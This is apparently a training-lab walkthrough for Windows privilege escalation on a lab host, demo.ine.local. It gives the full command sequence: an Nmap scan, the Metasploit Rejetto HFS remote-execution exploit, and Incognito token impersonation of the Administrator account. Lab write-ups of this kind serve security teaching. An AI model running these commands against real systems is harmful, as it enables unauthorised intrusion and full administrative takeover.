Privilege Escalation: Impersonate

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Escalate the privilege on a Windows machine.

Tools

  • Nmap

  • Metasploit Framework

Writeup

nmap -sSVC demo.ine.local
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run
getprivs
load incognito
list_tokens -u  # List available tokens
impersonate_token "ATTACKDEFENSE\Administrator"
getuid

Last updated